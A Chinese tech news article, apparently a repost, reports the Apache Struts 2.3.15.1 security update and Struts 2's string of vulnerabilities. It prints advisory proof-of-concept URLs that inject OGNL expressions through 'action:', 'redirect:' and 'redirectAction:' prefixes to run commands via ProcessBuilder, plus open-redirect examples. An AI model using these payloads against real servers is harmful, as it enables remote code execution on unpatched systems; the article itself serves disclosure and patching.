现在的位置: 首页 > 综合 > 正文

Struts 2 安全漏洞层出不穷为哪般?

2019年04月28日 ⁄ 综合 ⁄ 共 1688字 ⁄ 字号 评论关闭

Struts 2 安全漏洞层出不穷为哪般?

发表于2013-07-18 11:3112260次阅读| 来源Apache34 条评论|
作者王果 编译

摘要:Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本,据悉国内政府、金融、运营商及各大互联网公司的网站已受影响。Struts团队也紧急发布了更新版本。其实在此之前很长时间内,此类漏洞就一直存在。

Apache Struts团队6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞,因此该团队紧急发布了Struts 2.3.15.1安全更新版本。

该版本修复的主要安全漏洞如下:

1.  通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下:

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} 

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

 

2.  通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下:

<a href="http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/">http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/</a>

<a href="http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23">http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23</a>

 

详细漏洞信息:

最新版本下载地址: http://struts.apache.org/

Struts2漏洞层出不穷 

最近以来的Struts2更新似乎都在忙着修复各种安全漏洞,而这些漏洞都集中在此方面,比如5月底发布的Struts 2.3.14.2版本、6月初发布的2.3.14.3版本,都修复了相关的漏洞,而这些漏洞都可能导致执行远程命令、访问/控制会话以及发起XSS攻击等。

关于Struts2的安全漏洞分析可参阅:

抱歉!评论已关闭.